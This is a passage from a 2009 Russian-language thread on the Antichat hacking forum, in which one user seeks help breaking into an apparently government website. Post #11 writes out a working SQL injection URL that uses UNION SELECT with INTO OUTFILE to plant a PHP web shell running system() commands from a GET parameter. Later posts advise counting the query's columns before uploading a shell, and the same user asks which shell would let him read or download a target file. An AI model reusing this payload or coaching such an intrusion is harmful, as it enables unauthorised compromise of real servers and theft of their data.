ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 19.08.2009, 23:14
Аватар для serg-php
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

L I G A,

ты это миел ввиду?

_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*
 
Ответить с цитированием

  #12  
Старый 19.08.2009, 23:34
Аватар для L I G A
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от serg-php  
L I G A,

ты это миел ввиду?

_site.gov/main.php?cu=-1+union+select+null,null,'<? system($_GET['c']); ?>',null,null+INTO+OUTFILE+'../../../../*****/absolut/put`/k_www/shell.php'/*
я имел ввиду сначала подобрать количество полей,
в твоем запросе это количество "null'ов"
дальше будешь видеть что и как ,и мб сможешь залить простой шелл как ты продемонстрировал на своем примере.
и на будущее: для таких вопроов есть отдельная тема тыц
 
Ответить с цитированием

  #13  
Старый 19.08.2009, 23:37
Аватар для serg-php
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Цитата:
и на будущее: для таких вопроов есть отдельная тема тыц
Буду знать!
 
Ответить с цитированием

  #14  
Старый 19.08.2009, 23:38
Аватар для serg-php
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Кол-во полей в таблице известно - 14 я насчитал!
 
Ответить с цитированием

  #15  
Старый 19.08.2009, 23:42
Аватар для serg-php
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Какой шелл посоветуете, чтобы прочесть искомый файл или слить его локально?

Последний раз редактировалось serg-php; 19.08.2009 в 23:47..
 
Ответить с цитированием

  #16  
Старый 20.08.2009, 00:01
Аватар для L I G A
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


Отправить сообщение для L I G A с помощью ICQ
По умолчанию

Цитата:
Сообщение от serg-php  
Кол-во полей в таблице известно - 14 я насчитал!
что то я сомневаюсь,я б для начала посаветовал тебе не пожалеть время а сесть и прочитать замечательную статью
Dr.Z3r0 о SQL INJECTION в разделе "наши статьи",если оно тебе действительно надо,а не надеятся на кого то.
 
Ответить с цитированием

  #17  
Старый 20.08.2009, 00:28
Аватар для serg-php
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Читаю, пробую применить примеры от http://forum.antichat.ru/thread43966.html

Видимо фильтруется!
 
Ответить с цитированием

  #18  
Старый 21.08.2009, 16:26
Аватар для serg-php
serg-php
Участник форума
Регистрация: 28.01.2008
Сообщений: 247
Провел на форуме:
205760

Репутация: 28
По умолчанию

Очень сложно делать что-то впервый раз! Пытаюсь использовать изнания из статьи - не получается!
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
МикроДжоинер для начинающих ReanimatoR Статьи 23 02.01.2010 15:07
Фейки dgonik777 E-Mail 34 14.06.2009 04:01
Файл рассылки. помогите настроить. mss-s PHP, PERL, MySQL, JavaScript 10 09.05.2009 17:41
Помогите достать Shared Resource Scanner 6.2! n0lik Болталка 4 12.01.2009 15:09
Помогите открыть файл Sulf aka Joker Болталка 4 25.07.2006 21:59



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ